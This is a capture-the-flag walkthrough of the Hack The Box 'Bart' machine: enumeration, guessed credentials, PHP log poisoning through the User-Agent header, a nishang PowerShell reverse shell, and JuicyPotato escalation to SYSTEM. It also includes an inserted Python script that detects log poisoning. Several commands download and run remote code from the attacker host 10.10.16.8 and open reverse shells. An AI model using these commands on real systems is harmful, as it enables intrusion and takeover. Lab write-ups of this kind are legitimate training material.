Bart HTB
IP
10.10.10.81
Initial Nmap scan
sudo nmap -sV -sC -A -oA inital_nmap 10.10.10.81
Full Nmap scan
nmap -sV -p- -oA full_nmap_scan 10.10.10.81
Nothing new
Ports

80: HTTP
We can see that nmap did not follow the redirect, so let's add the domain to our hosts file
sudo vi /etc/hosts

To exit vim (just in case):
Esc   # press the Escape key
:wq   # write and quit
Now that we have added the domain to the hosts file, let's direct our attention to port 80 (HTTP)
Port 80 HTTP
When we first land on the page, Wappalyzer shows us the technologies the web server is using

From what we can tell, this web server:
uses WordPress version 4.8.2
has a MySQL database
uses PHP
is an IIS server (Windows)
First thing, let's perform some directory busting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -o dirs.txt
Let's let this run in the background
Quick note
While running feroxbuster I noticed I started to get a lot of 200 status codes, and all of them resulted in the following

Don't get me wrong, I love meerkats as much as the next person, but I don't want this showing up in my results, so let's modify our command a touch
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.81 -x php -C 200 -o dirs.txt
-C: exclude responses with the given status code (here 200)
Let's let this run for a bit and come back to it later
Looking at the home page's source we can see some interesting notes left behind

We can make out some possible usernames:
Harvey Potter
Developer@BART
h.potter@bart.htb
Looking through the main web page we can see a few other staff members:
Samantha Brown: CEO@bart
Daniel Simmons
Robert Hilton
Jane Doe: Developer@FluffyUnicorns
feroxbuster found a directory:
/monitor/

So far we know this is PHP Server Monitor v3.2.1
I couldn't find any default creds, but if we use the forgotten-password function and submit admin

the response tells us whether a given user exists on the system
Let's refer to the staff we found on the web page and in the page's source
Woohoo! We found a user

If we try Harvey's last name, potter, as the password, we are authenticated
Looks like it worked, but we'll have to add the subdomain to our hosts file


Now we can log back in with Harvey's credentials
harvey: potter

If we look at the Servers tab we can see another subdomain

For good measure, let's add this to our hosts file
When we navigate to http://internal-01.bart.htb/ we are greeted with another login screen

As you can probably guess, Harvey's creds don't work; we need a password with a minimum of eight characters
Let's perform further directory busting
feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal-01.bart.htb/simple_chat/ -x php -o dirs.txt
I keep getting server errors, most likely because we are not authenticated
Let's try some common creds with harvey
It actually worked
We found the creds for the login
harvey: Password1
When we log into the chat we can see the following

From what is discussed, there seems to be development code on the server; if we look at the page source

This looks promising
Let's navigate to
http://internal-01.bart.htb/log/log.php?filename=log.txt&username=harvey

My first thought was that it looks pretty static, but playing around with the URL parameters we do get a response back

I wonder if we can add any further functionality to it
Let's use Burp and catch a request
Looking at the request, I did try to modify both the filename and username parameters to see if I could inject PHP code, but with no luck
But we can successfully inject PHP code within the User-Agent header, which the script writes into the log file

Before we send this off we want to send it through Repeater. Now we can add the parameter cmd= and execute commands on the target system

We now have code execution on the target machine
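From the defender's side, the log poisoning above leaves two traces in the IIS access log: a PHP open tag inside the User-Agent field and a later request to the log viewer carrying a cmd parameter. The following detection script is an added example, not part of the original writeup; the W3C log excerpt it scans is constructed (the field order and the 10.10.16.8 client address are assumptions).

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not captured from the box): a normal hit, a
# request whose User-Agent carries a PHP open tag, and a follow-up call to
# log.php with a cmd parameter. IIS encodes spaces in fields as '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2024-01-01 10:00:00 GET /log/log.php filename=log.txt&username=harvey 10.10.16.8 Mozilla/5.0+(X11;+Linux) 200
2024-01-01 10:00:05 GET /log/log.php filename=log.txt&username=harvey 10.10.16.8 <?php+echo+'poisoned';+?> 200
2024-01-01 10:00:09 GET /log/log.php filename=log.txt&username=harvey&cmd=whoami 10.10.16.8 Mozilla/5.0 200
"""

# Matches the long (<?php) and short (<?=) PHP open tags.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields header.
    Each value is '+'/percent-decoded so encoded payloads are inspected as sent."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield {k: unquote_plus(v) for k, v in zip(fields, line.split(" "))}


def find_log_poisoning(text, log_script="/log/log.php"):
    """Return (entry_number, reason) for entries that look like log poisoning:
    a PHP tag in a client-controlled header, or the log viewer being called
    with a cmd parameter it was never designed to take."""
    hits = []
    for n, entry in enumerate(parse_w3c(text), start=1):
        if PHP_TAG.search(entry.get("cs(User-Agent)", "")):
            hits.append((n, "php tag in User-Agent"))
        if entry.get("cs-uri-stem") == log_script and "cmd=" in entry.get("cs-uri-query", ""):
            hits.append((n, "cmd parameter sent to log viewer"))
    return hits


if __name__ == "__main__":
    for number, reason in find_log_poisoning(SAMPLE_LOG):
        print(f"entry {number}: {reason}")
```

The same check works on the server's real u_ex*.log files by reading them in place of SAMPLE_LOG; any hit on the User-Agent rule means the log file should be treated as tainted, since the viewer includes it as PHP.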
Establishing a shell on the target system
Alright, let's set up our shell
We will use the nishang repo
https://github.com/samratashok/nishang.git
Copy the reverse shell script into our working directory
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 ./rev.ps1
Edit our Invoke-PowerShellTcp.ps1 script (now rev.ps1)

We just added this little snippet so that when the PowerShell script is executed it will automatically connect back to our local machine
Set up our Python web server
python3 -m http.server 9010
Set up our netcat listener
nc -lvnp 9001
From Burp, let's fetch our rev.ps1

Quick tip
Once you have typed out your PowerShell command, highlight it and press Ctrl+U to URL-encode it
We have a shell on the system

Privilege escalation via iusr
Let's run systeminfo and feed the output to wesng to see if we can find any exploits

Copy and paste the output into a file on our local machine
Update wes
python3 /opt/wesng/wes.py --update
Let's feed it to wes
python3 /opt/wesng/wes.py systeminfo.txt > possible_exploits
It found a number of exploits, but we will keep these in our back pocket in case we can't find anything else
Let's check for users on the system
net users

Let's check our privileges
whoami /priv

As we can see, SeImpersonatePrivilege is enabled, meaning we have a high chance of successfully using JuicyPotato to spawn a shell as NT AUTHORITY\SYSTEM
Alright, let's download some fresh potatoes and get to it
Once we have the JuicyPotato executable on our local machine, let's download it onto the target machine
Start a Python web server
python3 -m http.server 9010
We'll use PowerShell to retrieve the potato
(new-object net.webclient).downloadfile('http://10.10.16.8:9010/jp.exe', 'C:\Users\Public\Downloads\jp.exe')
We should now have jp.exe (JuicyPotato.exe) in the Downloads directory

Let's execute jp.exe and see what parameters we need to set:
-t createprocess call: we can use both
-p program to launch: we will execute a shell.bat file
-l COM server listen port: this can be, say, port 4444 on the local host
-c CLSID: since we know we are working on a Windows 10 Pro machine we can use the following repo to test possible CLSIDs; we'll use
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}

Alright, let's get our reverse shell ready
We'll just copy the script
cp rev.ps1 rev2.ps1
and change the port for the connection

Now we want to create a shell.bat file which will run our rev2.ps1; it should contain
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.16.8:9010/rev2.ps1')
Let's download our shell.bat onto the target machine
Set up a Python web server
python3 -m http.server 9010
From the target machine:
(new-object net.webclient).downloadfile('http://10.10.16.8:9010/shell.bat', 'C:\Users\Public\Downloads\shell.bat')
Start a netcat listener
nc -lvnp 9002
Alright, we should have the necessary files on the target system
Let's execute jp.exe
./jp.exe -t * -p shell.bat -l 4444 -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
We have a shell as NT AUTHORITY\SYSTEM
